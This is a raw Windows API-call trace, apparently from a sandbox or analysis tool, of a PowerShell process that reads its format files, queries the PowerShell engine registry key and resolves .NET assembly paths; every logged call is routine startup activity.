	[0163.661] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d2b0 | out: lpFileInformation=0x12d2b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0167.140] SetErrorMode (uMode=0x1) returned 0x1
	[0167.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0167.141] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d398 | out: phkResult=0x12d398*=0x30c) returned 0x0
	[0167.141] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d31c, lpData=0x0, lpcbData=0x12d318*=0x0 | out: lpType=0x12d31c*=0x1, lpData=0x0, lpcbData=0x12d318*=0x56) returned 0x0
	[0167.141] CoTaskMemAlloc (cb=0x5a) returned 0x3d74d0
	[0167.141] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d2ec, lpData=0x3d74d0, lpcbData=0x12d2e8*=0x56 | out: lpType=0x12d2ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d2e8*=0x56) returned 0x0
	[0167.141] CoTaskMemFree (pv=0x3d74d0) 
	[0167.141] RegCloseKey (hKey=0x30c) returned 0x0
	[0167.141] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0167.141] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0167.144] CoCreateGuid (in: pguid=0x12d5c0 | out: pguid=0x12d5c0*(Data1=0xcefaf830, Data2=0xe5b4, Data3=0x4876, Data4=([0]=0x94, [1]=0xf2, [2]=0x3, [3]=0xad, [4]=0x69, [5]=0xd6, [6]=0xb5, [7]=0x31))) returned 0x0
	[0167.148] CoCreateGuid (in: pguid=0x12d5c0 | out: pguid=0x12d5c0*(Data1=0x88ae1e07, Data2=0xb41a, Data3=0x4583, Data4=([0]=0x8b, [1]=0xf8, [2]=0x20, [3]=0xb0, [4]=0x76, [5]=0xe, [6]=0x76, [7]=0x39))) returned 0x0
	[0167.149] CoCreateGuid (in: pguid=0x12d5c0 | out: pguid=0x12d5c0*(Data1=0x26d6cc66, Data2=0x5c6d, Data3=0x4511, Data4=([0]=0xb0, [1]=0x7d, [2]=0xda, [3]=0x9d, [4]=0x1f, [5]=0xff, [6]=0x29, [7]=0x59))) returned 0x0
	[0167.150] CoCreateGuid (in: pguid=0x12d5c0 | out: pguid=0x12d5c0*(Data1=0xac8e19, Data2=0x4f50, Data3=0x492d, Data4=([0]=0x90, [1]=0xf3, [2]=0x49, [3]=0xfe, [4]=0xfc, [5]=0xda, [6]=0x75, [7]=0x3f))) returned 0x0
	[0167.150] CoCreateGuid (in: pguid=0x12d5c0 | out: pguid=0x12d5c0*(Data1=0xc5e4e69d, Data2=0xafa6, Data3=0x4f2f, Data4=([0]=0xa6, [1]=0x5a, [2]=0x54, [3]=0xc4, [4]=0x8b, [5]=0x3f, [6]=0x3e, [7]=0xb4))) returned 0x0
	[0167.151] CoCreateGuid (in: pguid=0x12d5c0 | out: pguid=0x12d5c0*(Data1=0xd46c77b8, Data2=0x502b, Data3=0x412a, Data4=([0]=0x8e, [1]=0x7b, [2]=0x41, [3]=0xeb, [4]=0xe5, [5]=0xa8, [6]=0x5f, [7]=0x6d))) returned 0x0
	[0167.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0167.152] SetErrorMode (uMode=0x1) returned 0x1
	[0167.152] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x30c
	[0167.152] GetFileType (hFile=0x30c) returned 0x1
	[0167.152] SetErrorMode (uMode=0x1) returned 0x1
	[0167.152] GetFileType (hFile=0x30c) returned 0x1
	[0167.152] ReadFile (in: hFile=0x30c, lpBuffer=0x3615db8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d308, lpOverlapped=0x0 | out: lpBuffer=0x3615db8*, lpNumberOfBytesRead=0x12d308*=0x1000, lpOverlapped=0x0) returned 1
	[0167.154] ReadFile (in: hFile=0x30c, lpBuffer=0x3615db8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d308, lpOverlapped=0x0 | out: lpBuffer=0x3615db8*, lpNumberOfBytesRead=0x12d308*=0x1000, lpOverlapped=0x0) returned 1
	[0167.154] ReadFile (in: hFile=0x30c, lpBuffer=0x3615db8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d308, lpOverlapped=0x0 | out: lpBuffer=0x3615db8*, lpNumberOfBytesRead=0x12d308*=0x1000, lpOverlapped=0x0) returned 1
	[0167.154] ReadFile (in: hFile=0x30c, lpBuffer=0x3615db8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d308, lpOverlapped=0x0 | out: lpBuffer=0x3615db8*, lpNumberOfBytesRead=0x12d308*=0x1000, lpOverlapped=0x0) returned 1
	[0167.156] ReadFile (in: hFile=0x30c, lpBuffer=0x3615db8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d308, lpOverlapped=0x0 | out: lpBuffer=0x3615db8*, lpNumberOfBytesRead=0x12d308*=0x1000, lpOverlapped=0x0) returned 1
	[0167.156] ReadFile (in: hFile=0x30c, lpBuffer=0x3615db8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d308, lpOverlapped=0x0 | out: lpBuffer=0x3615db8*, lpNumberOfBytesRead=0x12d308*=0x1000, lpOverlapped=0x0) returned 1
	[0167.156] ReadFile (in: hFile=0x30c, lpBuffer=0x3615db8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d308, lpOverlapped=0x0 | out: lpBuffer=0x3615db8*, lpNumberOfBytesRead=0x12d308*=0xaca, lpOverlapped=0x0) returned 1
	[0167.156] ReadFile (in: hFile=0x30c, lpBuffer=0x36153ea, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x12d308, lpOverlapped=0x0 | out: lpBuffer=0x36153ea*, lpNumberOfBytesRead=0x12d308*=0x0, lpOverlapped=0x0) returned 1
	[0167.156] ReadFile (in: hFile=0x30c, lpBuffer=0x3615db8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d308, lpOverlapped=0x0 | out: lpBuffer=0x3615db8*, lpNumberOfBytesRead=0x12d308*=0x0, lpOverlapped=0x0) returned 1
	[0167.156] CloseHandle (hObject=0x30c) returned 1
	[0167.156] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0167.156] SetErrorMode (uMode=0x1) returned 0x1
	[0167.157] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d2b0 | out: lpFileInformation=0x12d2b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0167.157] SetErrorMode (uMode=0x1) returned 0x1
	[0167.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0167.157] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d398 | out: phkResult=0x12d398*=0x30c) returned 0x0
	[0167.157] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d31c, lpData=0x0, lpcbData=0x12d318*=0x0 | out: lpType=0x12d31c*=0x1, lpData=0x0, lpcbData=0x12d318*=0x56) returned 0x0
	[0167.157] CoTaskMemAlloc (cb=0x5a) returned 0x3d74d0
	[0167.157] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d2ec, lpData=0x3d74d0, lpcbData=0x12d2e8*=0x56 | out: lpType=0x12d2ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d2e8*=0x56) returned 0x0
	[0167.157] CoTaskMemFree (pv=0x3d74d0) 
	[0167.157] RegCloseKey (hKey=0x30c) returned 0x0
	[0167.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0167.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0167.172] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x12c820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0167.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12c820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0167.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x12c820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0167.862] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0179.220] VirtualQuery (in: lpAddress=0x12be30, lpBuffer=0x12ccf0, dwLength=0x30 | out: lpBuffer=0x12ccf0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0179.221] CoCreateGuid (in: pguid=0x12d5c0 | out: pguid=0x12d5c0*(Data1=0x396e8f38, Data2=0xa3fe, Data3=0x46aa, Data4=([0]=0xa7, [1]=0x41, [2]=0xff, [3]=0x35, [4]=0xda, [5]=0x40, [6]=0xfa, [7]=0xb0))) returned 0x0
	[0179.222] CoCreateGuid (in: pguid=0x12d5c0 | out: pguid=0x12d5c0*(Data1=0x4ae0de67, Data2=0x3c7e, Data3=0x4963, Data4=([0]=0xba, [1]=0x97, [2]=0x82, [3]=0xd9, [4]=0x98, [5]=0x8f, [6]=0x43, [7]=0x3))) returned 0x0
	[0179.223] VirtualQuery (in: lpAddress=0x12bfe0, lpBuffer=0x12cea0, dwLength=0x30 | out: lpBuffer=0x12cea0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0179.224] VirtualQuery (in: lpAddress=0x12bfe0, lpBuffer=0x12cea0, dwLength=0x30 | out: lpBuffer=0x12cea0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0179.225] CoCreateGuid (in: pguid=0x12d5c0 | out: pguid=0x12d5c0*(Data1=0xcdbfdd2b, Data2=0x1186, Data3=0x477e, Data4=([0]=0x81, [1]=0x2f, [2]=0x66, [3]=0xdf, [4]=0xb, [5]=0x77, [6]=0x54, [7]=0x9e))) returned 0x0
	[0179.228] CoCreateGuid (in: pguid=0x12d5c0 | out: pguid=0x12d5c0*(Data1=0x3667087, Data2=0xc5e6, Data3=0x4626, Data4=([0]=0xbb, [1]=0x2d, [2]=0xd0, [3]=0x1f, [4]=0x96, [5]=0x81, [6]=0xc, [7]=0x62))) returned 0x0
	[0179.228] VirtualQuery (in: lpAddress=0x12c230, lpBuffer=0x12d0f0, dwLength=0x30 | out: lpBuffer=0x12d0f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0179.233] VirtualQuery (in: lpAddress=0x12b8a0, lpBuffer=0x12c760, dwLength=0x30 | out: lpBuffer=0x12c760*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0179.903] CoCreateGuid (in: pguid=0x12d5c0 | out: pguid=0x12d5c0*(Data1=0xab4c71f6, Data2=0x68fc, Data3=0x4023, Data4=([0]=0x97, [1]=0x34, [2]=0xaf, [3]=0xbe, [4]=0x45, [5]=0xde, [6]=0x69, [7]=0x60))) returned 0x0
	[0179.904] CoCreateGuid (in: pguid=0x12d5c0 | out: pguid=0x12d5c0*(Data1=0x2867b7ca, Data2=0x9262, Data3=0x47bf, Data4=([0]=0x92, [1]=0xe2, [2]=0xa9, [3]=0xd, [4]=0x22, [5]=0x59, [6]=0x76, [7]=0x5c))) returned 0x0
	[0179.905] CoCreateGuid (in: pguid=0x12d5c0 | out: pguid=0x12d5c0*(Data1=0x108e5e6, Data2=0x3d99, Data3=0x4f0a, Data4=([0]=0x96, [1]=0x4a, [2]=0x1e, [3]=0xe0, [4]=0x4a, [5]=0x2c, [6]=0x6f, [7]=0x69))) returned 0x0
	[0179.905] CoCreateGuid (in: pguid=0x12d5c0 | out: pguid=0x12d5c0*(Data1=0x60fe16a0, Data2=0x70c5, Data3=0x4ea7, Data4=([0]=0xb2, [1]=0x6a, [2]=0xdc, [3]=0xb1, [4]=0x49, [5]=0x28, [6]=0x14, [7]=0x7))) returned 0x0
	[0179.905] CoCreateGuid (in: pguid=0x12d5c0 | out: pguid=0x12d5c0*(Data1=0xa2d0523e, Data2=0x4a09, Data3=0x4899, Data4=([0]=0x88, [1]=0x1c, [2]=0xcf, [3]=0x48, [4]=0xc4, [5]=0xd1, [6]=0xbf, [7]=0xb4))) returned 0x0
	[0179.906] CoCreateGuid (in: pguid=0x12d5c0 | out: pguid=0x12d5c0*(Data1=0x60ff5ba, Data2=0xd8c7, Data3=0x4ba8, Data4=([0]=0x80, [1]=0x70, [2]=0xba, [3]=0x7b, [4]=0x47, [5]=0xf4, [6]=0x5f, [7]=0x2e))) returned 0x0
	[0179.906] VirtualQuery (in: lpAddress=0x12bf70, lpBuffer=0x12ce30, dwLength=0x30 | out: lpBuffer=0x12ce30*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0179.907] CoCreateGuid (in: pguid=0x12d5c0 | out: pguid=0x12d5c0*(Data1=0x9d4589dd, Data2=0x82f8, Data3=0x41cc, Data4=([0]=0x96, [1]=0xc7, [2]=0x9e, [3]=0xd1, [4]=0x9e, [5]=0xb4, [6]=0xa0, [7]=0x49))) returned 0x0
	[0179.907] VirtualQuery (in: lpAddress=0x12bf70, lpBuffer=0x12ce30, dwLength=0x30 | out: lpBuffer=0x12ce30*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0179.908] VirtualQuery (in: lpAddress=0x12bf70, lpBuffer=0x12ce30, dwLength=0x30 | out: lpBuffer=0x12ce30*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0190.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.122] CoCreateGuid (in: pguid=0x12d5c0 | out: pguid=0x12d5c0*(Data1=0x8e961671, Data2=0x1144, Data3=0x494e, Data4=([0]=0x85, [1]=0x4b, [2]=0xed, [3]=0x99, [4]=0xba, [5]=0xb1, [6]=0x0, [7]=0x9c))) returned 0x0
	[0190.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.123] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.123] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.123] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.123] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.123] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.123] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.123] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.123] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.125] VirtualQuery (in: lpAddress=0x12b5d0, lpBuffer=0x12c490, dwLength=0x30 | out: lpBuffer=0x12c490*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
